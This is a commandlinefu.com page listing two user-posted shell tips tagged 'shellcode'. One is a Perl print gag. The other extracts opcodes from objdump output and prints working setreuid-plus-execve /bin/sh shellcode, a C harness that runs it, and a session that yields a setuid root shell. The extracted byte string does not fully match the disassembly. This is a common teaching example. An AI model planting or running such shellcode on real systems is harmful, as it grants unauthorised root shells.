Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

OpenID

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

» all commands
» commands with 3 up-votes (commandlinefu3)
» commands with 10 up-votes (commandlinefu10)
» commands tagged shellcode

Hide

News

2011-03-12 - Confoo 2011 presentation: Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands: To try and put and end to the spamming, new commands require moderation before they will appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner: Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed: Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.

Hide

Functions

Hide

Credits

Site by David Winterbottom (user root).

Commands tagged shellcode

Terminal - Commands tagged shellcode - 2 results

perl -e 'print "\x41\x72\x74\x20\x6f\x66\x20\x68\x61\x63\x6b\x69\x6e\x67\x2e\x2e\x2e\n" x 100'

This is sample output - yours may be different.

gunslinger@localhost:~/shellcode$ perl -e 'print "\x41\x72\x74\x20\x6f\x66\x20\x68\x61\x63\x6b\x69\x6e\x67\x2e\x2e\x2e\n" x 100'
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
Art of hacking...
gunslinger@localhost:~/shellcode$

2010-07-11 16:32:00

User: gunslinger_

Functions: perl

Tags: perl shellcode

-15

Up
Down

Art of hacking on perl

Print "Art of hacking..." 100 times by perl

or you can this tools : http://packetstormsecurity.org/shellcode/shellcodeencdec.py.txt

This is sample output - yours may be different.

gunslinger@localhost:~/$ objdump -d shell

shell:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060:	31 c0                	xor    %eax,%eax
 8048062:	31 db                	xor    %ebx,%ebx
 8048064:	31 c9                	xor    %ecx,%ecx
 8048066:	31 d2                	xor    %edx,%edx
 8048068:	b0 46                	mov    $0x46,%al
 804806a:	31 db                	xor    %ebx,%ebx
 804806c:	31 c9                	xor    %ecx,%ecx
 804806e:	cd 80                	int    $0x80
 8048070:	b0 0b                	mov    $0xb,%al
 8048072:	53                   	push   %ebx
 8048073:	68 2f 2f 73 68       	push   $0x68732f2f
 8048078:	68 2f 62 69 6e       	push   $0x6e69622f
 804807d:	89 e3                	mov    %esp,%ebx
 804807f:	31 c9                	xor    %ecx,%ecx
 8048081:	31 c9                	xor    %ecx,%ecx
 8048083:	53                   	push   %ebx
 8048084:	cd 80                	int    $0x80
gunslinger@localhost:~/$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\xcd\x80\x31\xc0\xb0\x0b\x31\xdb\xcd\x80"
gunslinger@localhost:~/$

-------------------------------shellcodetest.c---------------------------------
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"
		   "\xc9\xcd\x80\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f"
		   "\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\x53\xcd\x80";

int main(void)
{
	(*(void(*)()) shellcode)();
}
------------------------------------EOF----------------------------------------

root@localhost:/home/gunslinger/# vim shellcodetest.c
root@localhost:/home/gunslinger/# cat shellcodetest.c
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\x31\xdb\x31"
		   "\xc9\xcd\x80\xb0\x0b\x53\x68\x2f\x2f\x73\x68\x68\x2f"
		   "\x62\x69\x6e\x89\xe3\x31\xc9\x31\xc9\x53\xcd\x80";

int main(void)
{
	(*(void(*)()) shellcode)();
}
root@localhost:/home/gunslinger/# gcc -o shellcodetest shellcodetest.c
root@localhost:/home/gunslinger/# chown root:root shellcodetest.c
root@localhost:/home/gunslinger/# chmod 4755 shellcodetest
root@localhost:/home/gunslinger/# exit
gunslinger@localhost:~/$ ./shellcodetest
# id
uid=0(root) gid=1000(gunslinger) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(admin),122(sambashare),1000(gunslinger)
# whoami
root
# echo GAMEOVER
GAMEOVER
# exit
gunslinger@localhost:~/$

2010-07-11 15:44:48

User: gunslinger_

Functions: cut grep objdump paste sed tr

Tags: Programming Linux shellcode objdump gunslinger_ assembly opcode

Up
Down

Get all shellcode on binary file from objdump

Tired copy paste to get opcode from objdump huh ?

Get more @ http://gunslingerc0de.wordpress.com